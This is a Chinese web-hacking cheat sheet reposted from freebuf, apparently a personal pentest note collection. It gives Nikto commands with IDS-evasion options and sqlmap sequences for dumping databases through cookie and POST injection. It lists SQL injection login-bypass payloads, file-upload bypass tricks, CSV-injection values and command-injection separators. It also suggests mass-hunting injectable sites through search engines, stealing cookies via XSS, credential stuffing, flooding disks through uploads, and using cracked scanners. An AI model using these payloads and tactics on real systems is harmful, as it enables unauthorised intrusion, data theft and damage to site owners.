获取更多学习资料、想加入社群、深入学习,请扫我的二维码或加Memory20000427。
进来先点个赞,评个论,关个注呗~
0x02 漏洞挖掘
1.漏洞扫描工具
注意:登录类网站扫描要带cookies扫才能扫到
1.1Nikto Web服务漏洞扫描器
Tips:利用-Format选项来导出特定格式的扫描结果,使扫描结果更容易阅读和分析。
nikto -host http://example.com -output ~/nikto.html -Format html
NIKTO使用方法:
1、命令:nikto -update #升级,更新插件;
2、Nikto -list-plugins #查看插件;
3、Nikto -host http://1.1.1.1 #扫描目标:域名方式;
4、Nikto -host http://1.1.1.1 -output #扫描并输出结果
5、Nikto -host 1.1.1.1 -port 80 #扫描目标:ip地址加端口号
6、Nikto -host http://www.baidu.com -port 443 -ssl #扫描https网站
7、Nikto -host 文件名.txt #批量扫描目标
8、nmap -p80 192.168.1.0/24 -oG – | nikto -host –
#利用nmap扫描开放80端口的IP段并且oG(nmap结果输出并整理)通过管道的方式
“|”用nikto进行扫描
9、nikto -host 192.168.0.1 -useproxy http://localhost:8070
#利用代理进行扫描
10、-vhost
#当一个网站存在多个端口时可以使用-vhost
遍历所有网站进行扫描或一个ip对应多个网站
11、Nikto交互形参数
配置文件:
路径:/etc/nikto.conf
User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本;
在nikto中最好修改成别的浏览器user agent;
设置cookie:
在配置文件中找到cookie进行设置(#STATIC-COOKIE= “cookie1″=”cookie value”;”cookie2″=”cookie val”)
IDS逃避技术:
主要为了躲避IDS、IPS检测告警-evasion #此参数使用方式(Nikto -host http://1.1.1.1 -evasion 1234)
逃避方式共8种:
1、随机url编码,2、自选路径,3、过早结束的URL
4、优先考虑长随机字符串5、参数欺骗
6、使用TAB作为命令的分隔符,7、使用变化的URL
8、使用Windows路径分隔符
1.2AWVS漏扫
这个没什么好说的,破解版到处都是。
1.3NESSUS
实时更新插件的漏扫,很好用,就是激活流程麻烦。
https://www.wuyini.cn/765.html
1.4Xray自动化的漏洞挖掘
burp+xray:
BurpSuite + Xray 被动扫描配置 – Ritte – 博客园
或者直接挂浏览器,点到哪里,扫到哪里
xray+各种漏扫联动
1.5Fuzz
Fuzz可以发现应用程序中没有被引用但是确实是可以访问的页面。
Discover Content是Burp中专门用于此目的的工具。
Burp Intruder也可以通过字典攻击来实施强制浏览(通常是在url参数和文件路径部分进行修改),爆破、注入等。
FuzzDB包含一些用于此目的的非常牛逼的字典。
2.挖掘漏洞
2.1SQL注入:
初步测试:见框就上,加’ ” ) ))% and 1=1 and 1=2 and2-1 or ,
抓包爆破常用SQL注入payload字典,上burp intruder
纯手工注入和手工绕过waf,详见笔记。
通过搜索引擎,批量查找注入点,详见笔记。
然后用傀儡注入点批量搜集工具
实操案例:
sql注入思路(登录界面)和网络常用端口_u011975363的专栏-CSDN博客
超级SQL注入工具(github)
sqlmap一把梭:
注意:命令为kali linux中运行的 (windows中用python sqlmap.py执行)
注入六连:
1.sqlmap -u “http://www.xx.com?id=x” 查询是否存在注入点
2.–dbs 检测站点包含哪些数据库
3.–current-db 获取当前的数据库名
4.–tables -D “db_name” 获取指定数据库中的表名 -D后接指定的数据库名称
5.–columns -T “table_name” -D “db_name” 获取数据库表中的字段
6.–dump -C “columns_name” -T “table_name” -D “db_name”
获取字段的数据内容
COOKIE注入:
sqlmap -u “http://www.xx.com/xxx.asp” –cookie “id=XXX cookie” –level 2 \
cookie注入 后接cookie值
POST注入:
(1)目标地址http:// http://www.xxx.com /login.asp
(2)打开burp代理
(3)点击表单提交
(4)burp获取拦截信息(post)
(5)右键保存文件(.txt)到指定目录下
(6)运行sqlmap并执行如下命令:
用例:sqlmap -r okay.txt -p username
// -r表示加载文件(及步骤(5)保存的路径)
-p指定参数(即拦截的post请求中表单提交的用户名或密码等name参数)
(7)自动获取表单:–forms自动获取表单
例如:sqlmap -u http://www.xx.com/login.asp –forms
(8)指定参数搜索:–data
例如:sqlmap -u http://www.xx.com/login.asp –data “username=1”
常用指令:
-
–purge 【重新扫描(–purge 删除原先对该目标扫描的记录)
-
–tables 【获取表名
-
–dbs 【检测站点包含哪些数据库
-
–current-db 【获取当前的数据库名
-
–current-user 【检测当前用户
-
–is-dba 【判断站点的当前用户是否为数据库管理员
-
–batch 【默认确认,不询问你是否输入
-
–search 【后面跟参数 -D -T -C 搜索列(C),表(T)和或数据库名称(D)
-
–threads 10 【线程,sqlmap线程最高设置为10
10.–level 3 【sqlmap默认测试所有的GET和POST参数,当–level的值大于等于2的时候也会测试HTTP Cookie头
的值,
当大于等于3的时候也会测试User-Agent和HTTP Referer头的值。最高为5
11.–risk 3 【执行测试的风险(0-3,默认为1)risk越高,越慢但是越安全
12.-v 【详细的等级(0-6)
0:只显示Python的回溯,错误和关键消息。
1:显示信息和警告消息。
2:显示调试消息。
3:有效载荷注入。
4:显示HTTP请求。
5:显示HTTP响应头。
6:显示HTTP响应页面的内容 -
–privileges 【查看权限
-
–tamper xx.py,cc.py 【防火墙绕过,后接tamper库中的py文件
-
–method “POST” –data “page=1&id=2” 【POST方式提交数据
-
–threads number 【采用多线程 后接线程数
-
–referer “” 【使用referer欺骗
-
–user-agent “” 【自定义user-agent
-
–proxy “目标地址″ 【使用代理注入
sqlmap常用路径:
-
添加表字段的目录在/usr/share/sqlmap/txt/common-tables.txt
-
存放扫描记录的目录在/root/.sqlmap/output
高阶玩法:
自己写tamper.py
2.2XSS:
xss漏洞原理分析与挖掘方法 – 知乎
web漏洞 | XSS(跨站攻击脚本)详解
XSS汇总
XSS小结 – 先知社区
2020跨站点脚本[xss]速查表|雨苁
XSSer自动化工具
XSStrike 自动化绕过WAF
xss payload字典 burp爆破
客服对话系统上XSS打cookie
搭建XSS平台 3s.wf/
http://xssor.io
2.3文件上传
字典生成 https://github.com/c0ny1/upload-fuzz-dic-builder
文件上传绕过总结,详见笔记
目录穿越
上传后如果没有被文件重命名,可以在文件名值做目录跳转
注意一些像目录的参数名
dir path location url
文件头绕过
修改上传类型 Content-Type
双文件上传
截断
长文件名
长Content-Disposition
%00截断
特殊文件
svg / html / htm / swf
xss
pdf
chrome 里可以跳转
cer / asa / spx / php5 / phtml
可能会被当做动态语言解析
.htaccess / .user.ini / web.config / web.xml
修改解析规则
.xls / .xlsx
POI Excel XXE
.tar / .tar.gz / .zip
可能存在文件释放目录跳转问题
.pkl
python反序列化文件
.xml
可能有 XXE
.yaml / .yml
YAML 反序列化
.jar / .class
上传到 java classpath 的目录下,类被加载时执行代码
无大小和次数限制
无限上传制造垃圾数据堵死硬盘
有图片加工的地方可以注意一下imagemagick命令执行
文件读取
读取系统敏感文件
文件包含
可读取文件或代码执行
文件删除
删除配置文件可破坏网站
删除安装锁可重装
文件解压
如果上传文件为 tar / tar.gz 类型,可以尝试构压缩包内文件名为../../../../xxx 的tar包
文件导出
如果是CSV 或者 Excel可以注意一下CSV注入
=2222-1
-1+1=2222-1
@=2222-1
\r\n=2222-1
111,=2222-1,
2.4命令执行
命令注入
–xxxx 参数注入
| 和 | | 与符号
& 和 && 与符号
; 分号
${}
代码执行
表达式
freemarker
OGNL
Spel
jsel
非表达式(php)
eval
assert
call_user_func() / call_user_func_array()
preg_replace()
create_function()
array_map()
array_filter()
usort() / uasort()
反序列化
php 源文件拼接写入
java
反序列化
远程 jar 加载
反射机制
jsp 源文件拼接写入
2.5弱口令及字典破解
后台弱口令爆破撞库
(尝试万能密码、特定资产常用密码、弱口令后再撞库、有的数据库要输对用户名再注释
我的github有收集的字典 https://github.com/hackerX2021)
asp aspx万能密码
1: "or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6: "or 1=1--
7:'or'a'='a
8: "or"="a'='a
9:'or''='
10:'or'='or'
11: 1 or '1'='1'=1
12: 1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
16: 新型万能登陆密码
用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)
密码 1
Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1
17..admin' or 'a'='a 密码随便
PHP万能密码
'or'='or'
'or 1=1/* 字符型 GPC是否开都可以使用
User: something
Pass: ' OR '1'='1
jsp 万能密码
1'or'1'='1
admin' OR 1=1/*
用户名:admin 系统存在这个用户的时候 才用得上
密码:1'or'1'='1
pydictor、cupp、crunch字典生成工具、自写字典生成py(小黑的人名字典py);
dymerge字典合并去重工具、自己写去重py;hydra爆破工具
tips:
超级弱口令检验工具
burpsuite 爆破
使用弱用户名对密码进行暴力破解
使用弱口令密码对用户名进行暴力破解
来源:freebuf.com 2021-04-19 23:34:09 by: 白色的空盒子
请登录后发表评论
注册